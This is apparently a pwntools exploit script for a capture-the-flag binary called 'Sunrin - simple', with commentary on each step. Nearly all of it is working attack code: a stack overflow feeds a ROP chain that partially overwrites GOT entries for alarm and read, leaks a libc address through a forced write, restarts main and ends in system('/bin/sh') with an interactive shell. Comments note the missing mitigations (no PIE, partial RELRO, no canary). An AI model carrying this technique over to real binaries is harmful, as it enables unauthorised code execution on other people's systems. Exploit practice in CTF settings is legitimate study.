Sunrin - simple
from pwn import *

# Exploit script for the "Sunrin - simple" challenge binary ("problem"):
# a stack buffer overflow is turned into a ROP chain that patches GOT
# entries with partial overwrites, leaks a libc address through a forced
# write(), restarts main and finishes with system("/bin/sh").
# Written against Python 2 pwntools (str payloads, str.ljust with '\x00').
#
# Defender's view -- everything below depends on the target lacking the
# usual hardening: the gadget addresses are hard-coded (0x4005fc, 0x400601,
# 0x400603 -> no PIE), the GOT is written at run time (-> not full RELRO),
# and the return address is reached with a plain 0x38-byte filler (-> no
# stack canary, as far as this script shows).  Any one of those mitigations
# would break the chain as written.

#context.log_level='debug'
r=process('problem')
e=ELF('problem')
libc=e.libc                 # libc as resolved by pwntools for the process
syscall='\x7b'              # unused in this script
#write='\xb9'
#0x00000000004005fc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# Disassembly of the tail of __libc_fork, used as a "mov eax, r13d" gadget:
# its low 16 bits (0x9517) are written into alarm's GOT entry further down.
# These offsets belong to one specific libc build.
'''
0x7ffff7ad9517 <__libc_fork+471>: mov eax,r13d
0x7ffff7ad951a <__libc_fork+474>: pop rbx
0x7ffff7ad951b <__libc_fork+475>: pop r12
0x7ffff7ad951d <__libc_fork+477>: pop r13
0x7ffff7ad951f <__libc_fork+479>: pop r14
0x7ffff7ad9521 <__libc_fork+481>: pop r15
0x7ffff7ad9523 <__libc_fork+483>: pop rbp
0x7ffff7ad9524 <__libc_fork+484>: ret
'''
# Stage 1.  0x38 bytes of filler presumably reach the saved return address;
# the vulnerable function's frame layout is not shown here.
payload='A'*0x38
# 0x400601 is used as a two-pop gadget and 0x400603 as a one-pop gadget,
# both sitting inside the csu "pop r12..r15; ret" at 0x4005fc -- presumably
# pop rsi; pop r15; ret and pop rdi; ret from the misaligned decode (confirm
# in a disassembler).
# read(.., got['alarm'], ..): the next chunk sent lands in alarm's GOT entry.
payload+=p64(0x400601)
payload+=p64(e.got['alarm'])
payload+=p64(0xdeadbeef)    # filler for the second pop
payload+=p64(e.plt['read'])
# read(.., got['read'], ..): the chunk after that patches read's GOT entry.
payload+=p64(0x400601)
payload+=p64(e.got['read'])
payload+=p64(0xdeadbeef)
payload+=p64(e.plt['read'])
# r12..r15 = 1, then the patched alarm@plt (mov eax,r13d; six pops; ret)
# leaves eax = 1 and consumes the six zero words that follow.
payload+=p64(0x4005fc)
payload+=p64(1)*4
payload+=p64(e.plt['alarm'])
payload+=p64(0)*6
# rdi = 1, then read@plt, which by now apparently points into read's own
# syscall stub (the -0xe in the leak arithmetic below): with eax = 1 this
# behaves as write(1, got['read'], ..) and leaks a libc address.
payload+=p64(0x400603)
payload+=p64(1)
payload+=p64(e.plt['read'])
# rdi = 0, rsi = got['alarm']; alarm@plt again gives eax = 0 (r13 is 0 from
# the previous six pops), so read@plt now reads the next chunk sent (0x9200
# below) into alarm's GOT entry.
payload+=p64(0x400603)
payload+=p64(0)
payload+=p64(0x400601)
payload+=p64(e.got['alarm'])*2
payload+=p64(e.plt['alarm'])
payload+=p64(0)*6
payload+=p64(e.plt['read'])
payload+=p64(e.symbols['main'])    # restart main for the second overflow
# The sleeps separate the sends so each read() consumes exactly one chunk.
# The chain never sets rdx (the read length); it apparently relies on what
# the previous call left there -- timing- and state-dependent, hence fragile.
sleep(0.1)
r.send(payload)
sleep(0.1)
r.send(p16(0x9517))         # low 16 bits of alarm's GOT -> __libc_fork+471
sleep(0.1)
r.send('\x5e')              # low byte of read's GOT; leak math implies read+0xe
sleep(0.1)
# Leak: everything up to the first 0x7f byte is taken as the libc address
# of read+0xe, so subtracting read's offset (+0xe) gives the libc base.
# NOTE(review): the bare except swallows any failure but leaves `leak`
# unbound, so the `leak+...` lines below then fail with NameError rather
# than a clear message; the handler should at least log and exit.
try:
    leak=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['read']-0xe
    log.info(hex(leak))
except:
    pass
#raw_input()
r.send(p16(0x9200))         # second partial write into alarm's GOT; presumably keeps the restarted main's alarm() call harmless -- not shown
sleep(0.1)
# Stage 2: plain ret2libc -- pop rdi; "/bin/sh"; system.
# libc.search() returns an iterator; [0] raises IndexError if no match.
payload='A'*0x38
payload+=p64(0x400603)
payload+=p64(leak+list(libc.search("/bin/sh"))[0])
payload+=p64(leak+libc.symbols['system'])
r.send(payload)
r.interactive()